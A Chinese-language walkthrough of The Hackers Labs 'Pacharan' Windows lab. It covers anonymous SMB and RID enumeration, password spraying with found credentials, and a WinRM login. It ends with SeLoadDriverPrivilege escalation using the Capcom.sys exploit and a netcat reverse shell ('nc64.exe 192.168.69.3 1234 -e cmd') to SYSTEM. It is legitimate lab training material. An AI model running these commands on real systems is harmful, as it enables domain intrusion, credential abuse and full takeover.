TheHackersLabs Pacharan Walkthrough

靶场:The Hackers Labs
地址:https://thehackerslabs.com/pacharan/
系统:windows
内容:smb信息检索、rpcclient使用、SeLoadDriverPrivilege提权

这个靶机采用固定IP192.168.69.69,先要设置下网卡。
扫描端口。

└─$ nmap -sV -sC -Pn -p- -oN port.log $IP      
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-09 11:54 CST
Nmap scan report for 192.168.69.69
Host is up (0.00040s latency).
Not shown: 65511 closed tcp ports (reset)
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-11-09 10:54:41Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: PACHARAN.THL, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: PACHARAN.THL, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0 
9389/tcp  open  mc-nmf        .NET Message Framing
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0 
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  msrpc         Microsoft Windows RPC
49670/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49671/tcp open  msrpc         Microsoft Windows RPC
49673/tcp open  msrpc         Microsoft Windows RPC
49676/tcp open  msrpc         Microsoft Windows RPC
49686/tcp open  msrpc         Microsoft Windows RPC
MAC Address: 08:00:27:85:92:9F (Oracle VirtualBox virtual NIC)
Service Info: Host: WIN-VRU3GG3DPLJ; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_nbstat: NetBIOS name: WIN-VRU3GG3DPLJ, NetBIOS user: <unknown>, NetBIOS MAC: 08:00:27:85:92:9f (Oracle VirtualBox virtual NIC)
|_clock-skew: 6h59m58s
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2024-11-09T10:55:29
|_  start_date: 2024-11-09T10:52:07

习惯从检索smb目录开始。

└─$ crackmapexec smb $IP -u 'null' -p '' --shares
SMB         192.168.69.69   445    WIN-VRU3GG3DPLJ  [*] Windows 10 / Server 2016 Build 14393 x64 (name:WIN-VRU3GG3DPLJ) (domain:PACHARAN.THL) (signing:True) (SMBv1:False)
SMB         192.168.69.69   445    WIN-VRU3GG3DPLJ  [+] PACHARAN.THL\null: 
SMB         192.168.69.69   445    WIN-VRU3GG3DPLJ  [+] Enumerated shares
SMB         192.168.69.69   445    WIN-VRU3GG3DPLJ  Share           Permissions     Remark
SMB         192.168.69.69   445    WIN-VRU3GG3DPLJ  -----           -----------     ------
SMB         192.168.69.69   445    WIN-VRU3GG3DPLJ  ADMIN$                          Admin remota
SMB         192.168.69.69   445    WIN-VRU3GG3DPLJ  C$                              Recurso predeterminado
SMB         192.168.69.69   445    WIN-VRU3GG3DPLJ  IPC$            READ            IPC remota
SMB         192.168.69.69   445    WIN-VRU3GG3DPLJ  NETLOGON                        Recurso compartido del servidor de inicio de sesión 
SMB         192.168.69.69   445    WIN-VRU3GG3DPLJ  NETLOGON2       READ            
SMB         192.168.69.69   445    WIN-VRU3GG3DPLJ  PACHARAN                        
SMB         192.168.69.69   445    WIN-VRU3GG3DPLJ  PDF Pro Virtual Printer                 Soy Hacker y arreglo impresoras
SMB         192.168.69.69   445    WIN-VRU3GG3DPLJ  print$                          Controladores de impresora
SMB         192.168.69.69   445    WIN-VRU3GG3DPLJ  SYSVOL                          Recurso compartido del servidor de inicio de sesión 
SMB         192.168.69.69   445    WIN-VRU3GG3DPLJ  Users

看下用户名。

└─$ netexec smb $IP -u 'anonymous' -p '' --rid-brute
SMB         192.168.69.69   445    WIN-VRU3GG3DPLJ  [*] Windows 10 / Server 2016 Build 14393 x64 (name:WIN-VRU3GG3DPLJ) (domain:PACHARAN.THL) (signing:True) (SMBv1:False)
SMB         192.168.69.69   445    WIN-VRU3GG3DPLJ  [+] PACHARAN.THL\anonymous: (Guest)
SMB         192.168.69.69   445    WIN-VRU3GG3DPLJ  498: PACHARAN\Enterprise Domain Controllers de sólo lectura (SidTypeGroup)
SMB         192.168.69.69   445    WIN-VRU3GG3DPLJ  500: PACHARAN\Administrador (SidTypeUser)
SMB         192.168.69.69   445    WIN-VRU3GG3DPLJ  501: PACHARAN\Invitado (SidTypeUser)
SMB         192.168.69.69   445    WIN-VRU3GG3DPLJ  502: PACHARAN\krbtgt (SidTypeUser)
SMB         192.168.69.69   445    WIN-VRU3GG3DPLJ  503: PACHARAN\DefaultAccount (SidTypeUser)
SMB         192.168.69.69   445    WIN-VRU3GG3DPLJ  512: PACHARAN\Admins. del dominio (SidTypeGroup)
SMB         192.168.69.69   445    WIN-VRU3GG3DPLJ  513: PACHARAN\Usuarios del dominio (SidTypeGroup)
SMB         192.168.69.69   445    WIN-VRU3GG3DPLJ  514: PACHARAN\Invitados del dominio (SidTypeGroup)
SMB         192.168.69.69   445    WIN-VRU3GG3DPLJ  515: PACHARAN\Equipos del dominio (SidTypeGroup)
SMB         192.168.69.69   445    WIN-VRU3GG3DPLJ  516: PACHARAN\Controladores de dominio (SidTypeGroup)
SMB         192.168.69.69   445    WIN-VRU3GG3DPLJ  517: PACHARAN\Publicadores de certificados (SidTypeAlias)
SMB         192.168.69.69   445    WIN-VRU3GG3DPLJ  518: PACHARAN\Administradores de esquema (SidTypeGroup)
SMB         192.168.69.69   445    WIN-VRU3GG3DPLJ  519: PACHARAN\Administradores de empresas (SidTypeGroup)
SMB         192.168.69.69   445    WIN-VRU3GG3DPLJ  520: PACHARAN\Propietarios del creador de directivas de grupo (SidTypeGroup)
SMB         192.168.69.69   445    WIN-VRU3GG3DPLJ  521: PACHARAN\Controladores de dominio de sólo lectura (SidTypeGroup)
SMB         192.168.69.69   445    WIN-VRU3GG3DPLJ  522: PACHARAN\Controladores de dominio clonables (SidTypeGroup)
SMB         192.168.69.69   445    WIN-VRU3GG3DPLJ  525: PACHARAN\Protected Users (SidTypeGroup)
SMB         192.168.69.69   445    WIN-VRU3GG3DPLJ  526: PACHARAN\Administradores clave (SidTypeGroup)
SMB         192.168.69.69   445    WIN-VRU3GG3DPLJ  527: PACHARAN\Administradores clave de la organización (SidTypeGroup)
SMB         192.168.69.69   445    WIN-VRU3GG3DPLJ  553: PACHARAN\Servidores RAS e IAS (SidTypeAlias)
SMB         192.168.69.69   445    WIN-VRU3GG3DPLJ  571: PACHARAN\Grupo de replicación de contraseña RODC permitida (SidTypeAlias)
SMB         192.168.69.69   445    WIN-VRU3GG3DPLJ  572: PACHARAN\Grupo de replicación de contraseña RODC denegada (SidTypeAlias)
SMB         192.168.69.69   445    WIN-VRU3GG3DPLJ  1000: PACHARAN\WIN-VRU3GG3DPLJ$ (SidTypeUser)
SMB         192.168.69.69   445    WIN-VRU3GG3DPLJ  1101: PACHARAN\DnsAdmins (SidTypeAlias)
SMB         192.168.69.69   445    WIN-VRU3GG3DPLJ  1102: PACHARAN\DnsUpdateProxy (SidTypeGroup)
SMB         192.168.69.69   445    WIN-VRU3GG3DPLJ  1103: PACHARAN\Orujo (SidTypeUser)
SMB         192.168.69.69   445    WIN-VRU3GG3DPLJ  1104: PACHARAN\Ginebra (SidTypeUser)
SMB         192.168.69.69   445    WIN-VRU3GG3DPLJ  1106: PACHARAN\Whisky (SidTypeUser)
SMB         192.168.69.69   445    WIN-VRU3GG3DPLJ  1107: PACHARAN\Hendrick (SidTypeUser)
SMB         192.168.69.69   445    WIN-VRU3GG3DPLJ  1108: PACHARAN\Chivas Regal (SidTypeUser)
SMB         192.168.69.69   445    WIN-VRU3GG3DPLJ  1111: PACHARAN\Whisky2 (SidTypeUser)
SMB         192.168.69.69   445    WIN-VRU3GG3DPLJ  1112: PACHARAN\JB (SidTypeUser)
SMB         192.168.69.69   445    WIN-VRU3GG3DPLJ  1113: PACHARAN\Chivas (SidTypeUser)
SMB         192.168.69.69   445    WIN-VRU3GG3DPLJ  1114: PACHARAN\beefeater (SidTypeUser)
SMB         192.168.69.69   445    WIN-VRU3GG3DPLJ  1115: PACHARAN\CarlosV (SidTypeUser)
SMB         192.168.69.69   445    WIN-VRU3GG3DPLJ  1116: PACHARAN\RedLabel (SidTypeUser)
SMB         192.168.69.69   445    WIN-VRU3GG3DPLJ  1117: PACHARAN\Gordons (SidTypeUser)

使用正则将用户名保存到names.txt。

└─$ netexec smb $IP -u 'anonymous' -p '' --rid-brute |grep -oP '(?<=PACHARAN\\)[^ ]+(?: [^ ]+)*(?= \(SidTypeUser\))'
Administrador
Invitado
krbtgt
DefaultAccount
WIN-VRU3GG3DPLJ$                                                                                                                                                              
Orujo                                                                                                                                                                         
Ginebra                                                                                                                                                                       
Whisky                                                                                                                                                                        
Hendrick                                                                                                                                                                      
Chivas Regal                                                                                                                                                                  
Whisky2                                                                                                                                                                       
JB                                                                                                                                                                            
Chivas                                                                                                                                                                        
beefeater                                                                                                                                                                     
CarlosV                                                                                                                                                                       
RedLabel                                                                                                                                                                      
Gordons

smb共享目录中,NETLOGON2是个不常见的目录,且可读,登录并下载到一个文件。

└─$ smbclient //$IP/NETLOGON2 -U 'null'                                      
Password for [WORKGROUP\null]:
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Thu Aug  1 01:25:34 2024
  ..                                  D        0  Thu Aug  1 01:25:34 2024
  Orujo.txt                           A       22  Thu Aug  1 01:25:55 2024

                7735807 blocks of size 4096. 4578355 blocks available
smb: \> get Orujo.txt
getting file \Orujo.txt of size 22 as Orujo.txt (10.7 KiloBytes/sec) (average 10.7 KiloBytes/sec)

查看文件内容,可能是Orujo用户的密码,测一下,PACHARAN目录变为可读了。

└─$ crackmapexec smb $IP -u Orujo -p $(cat Orujo.txt) --shares 
SMB         192.168.69.69   445    WIN-VRU3GG3DPLJ  [*] Windows 10 / Server 2016 Build 14393 x64 (name:WIN-VRU3GG3DPLJ) (domain:PACHARAN.THL) (signing:True) (SMBv1:False)
SMB         192.168.69.69   445    WIN-VRU3GG3DPLJ  [+] PACHARAN.THL\Orujo:Pericodelospalotes6969 
SMB         192.168.69.69   445    WIN-VRU3GG3DPLJ  [+] Enumerated shares
SMB         192.168.69.69   445    WIN-VRU3GG3DPLJ  Share           Permissions     Remark
SMB         192.168.69.69   445    WIN-VRU3GG3DPLJ  -----           -----------     ------
SMB         192.168.69.69   445    WIN-VRU3GG3DPLJ  ADMIN$                          Admin remota
SMB         192.168.69.69   445    WIN-VRU3GG3DPLJ  C$                              Recurso predeterminado
SMB         192.168.69.69   445    WIN-VRU3GG3DPLJ  IPC$            READ            IPC remota
SMB         192.168.69.69   445    WIN-VRU3GG3DPLJ  NETLOGON        READ            Recurso compartido del servidor de inicio de sesión 
SMB         192.168.69.69   445    WIN-VRU3GG3DPLJ  NETLOGON2                       
SMB         192.168.69.69   445    WIN-VRU3GG3DPLJ  PACHARAN        READ            
SMB         192.168.69.69   445    WIN-VRU3GG3DPLJ  PDF Pro Virtual Printer                 Soy Hacker y arreglo impresoras
SMB         192.168.69.69   445    WIN-VRU3GG3DPLJ  print$                          Controladores de impresora
SMB         192.168.69.69   445    WIN-VRU3GG3DPLJ  SYSVOL                          Recurso compartido del servidor de inicio de sesión 
SMB         192.168.69.69   445    WIN-VRU3GG3DPLJ  Users

以Orujo登录PACHARAN目录下,下载到另一个文件。

└─$ smbclient //$IP/PACHARAN -U Orujo%$(cat Orujo.txt) 
Try "help" to get a list of possible commands.
smb: \> ls -la
NT_STATUS_NO_SUCH_FILE listing \-la
smb: \> dir
  .                                   D        0  Thu Aug  1 01:21:13 2024
  ..                                  D        0  Thu Aug  1 01:21:13 2024
  ah.txt                              A      921  Thu Aug  1 01:20:16 2024

                7735807 blocks of size 4096. 4578355 blocks available
smb: \> get ah.txt
getting file \ah.txt of size 921 as ah.txt (89.9 KiloBytes/sec) (average 89.9 KiloBytes/sec)

ah.txt存储了许多类似密码的内容,可以爆破出这是Whisky的密码。

└─$ netexec smb $IP -u names.txt -p ah.txt
...
SMB         192.168.69.69   445    WIN-VRU3GG3DPLJ  [-] PACHARAN.THL\Orujo:MamasoyStream2er@ STATUS_LOGON_FAILURE 
SMB         192.168.69.69   445    WIN-VRU3GG3DPLJ  [-] PACHARAN.THL\Ginebra:MamasoyStream2er@ STATUS_LOGON_FAILURE 
SMB         192.168.69.69   445    WIN-VRU3GG3DPLJ  [+] PACHARAN.THL\Whisky:MamasoyStream2er@

通过Whisky用户,检索虚拟打印机的信息(因为刚才smb里显示有个pdf打印机),又发现一个疑似密码的信息。

└─$ rpcclient -U "Whisky%MamasoyStream2er@" $IP -c 'enumprinters'           
        flags:[0x800000]
        name:[\\192.168.69.69\Soy Hacker y arreglo impresoras]
        description:[\\192.168.69.69\Soy Hacker y arreglo impresoras,Universal Document Converter,TurkisArrusPuchuchuSiu1]
        comment:[Soy Hacker y arreglo impresoras]

同样可以得到该密码所属的用户。

└─$ netexec winrm $IP -u names.txt  -p TurkisArrusPuchuchuSiu1
WINRM       192.168.69.69   5985   WIN-VRU3GG3DPLJ  [*] Windows 10 / Server 2016 Build 14393 (name:WIN-VRU3GG3DPLJ) (domain:PACHARAN.THL)
...
WINRM       192.168.69.69   5985   WIN-VRU3GG3DPLJ  [+] PACHARAN.THL\Chivas Regal:TurkisArrusPuchuchuSiu1 (Pwn3d!)

登录shell后查看权限。

└─$ evil-winrm -i $IP -u  'Chivas Regal' -p TurkisArrusPuchuchuSiu1

Evil-WinRM shell v3.7

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Chivas Regal\Documents> whoami /priv

INFORMACIàN DE PRIVILEGIOS
--------------------------

Nombre de privilegio          Descripci¢n                                     Estado
============================= =============================================== ==========
SeMachineAccountPrivilege     Agregar estaciones de trabajo al dominio        Habilitada
SeLoadDriverPrivilege         Cargar y descargar controladores de dispositivo Habilitada
SeChangeNotifyPrivilege       Omitir comprobaci¢n de recorrido                Habilitada
SeIncreaseWorkingSetPrivilege Aumentar el espacio de trabajo de un proceso    Habilitada

SeLoadDriverPrivilege可以用来提权,在github上搜索相关代码,这里用的是https://github.com/k4sth4/SeLoadDriverPrivilege。

将相关文件上传到靶机,开始提权,注意驱动程序要使用绝对路径。

*Evil-WinRM* PS C:\Users\Chivas Regal\Desktop> .\eoploaddriver_x64.exe System\\CurrentControlSet\\dfserv 'C:\Users\Chivas Regal\Desktop\Capcom.sys'
*Evil-WinRM* PS C:\Users\Chivas Regal\Desktop> .\ExploitCapcom.exe LOAD 'C:\Users\Chivas Regal\Desktop\Capcom.sys'
[*] Service Name: koffbviz
[+] Enabling SeLoadDriverPrivilege
[+] SeLoadDriverPrivilege Enabled
[+] Loading Driver: \Registry\User\S-1-5-21-3046175042-3013395696-775018414-1108\?????????????????
NTSTATUS: 00000000, WinError: 0
*Evil-WinRM* PS C:\Users\Chivas Regal\Desktop> .\ExploitCapcom.exe EXPLOIT whoami
[*] Capcom.sys exploit
[*] Capcom.sys handle was obtained as 0000000000000064
[*] Shellcode was placed at 000001B08BE20008
[+] Shellcode was executed
[+] Token stealing was successful
[+] Command Executed
nt authority\system

将nc64.exe上传到靶机,并在本机监听,返回一个shell。

*Evil-WinRM* PS C:\Users\Chivas Regal\Desktop> cp \\192.168.69.3\kali\nc64.exe .\
*Evil-WinRM* PS C:\Users\Chivas Regal\Desktop> .\ExploitCapcom.exe EXPLOIT '.\nc64.exe 192.168.69.3 1234 -e cmd'

└─$ nc -nlvp 1234                                             
listening on [any] 1234 ...
connect to [192.168.69.3] from (UNKNOWN) [192.168.69.69] 62803
Microsoft Windows [Versin 10.0.14393]
(c) 2016 Microsoft Corporation. Todos los derechos reservados.

C:\Users\Chivas Regal\Desktop>whoami
whoami
nt authority\system

发表回复

您的电子邮箱地址不会被公开。 必填项已用 * 标注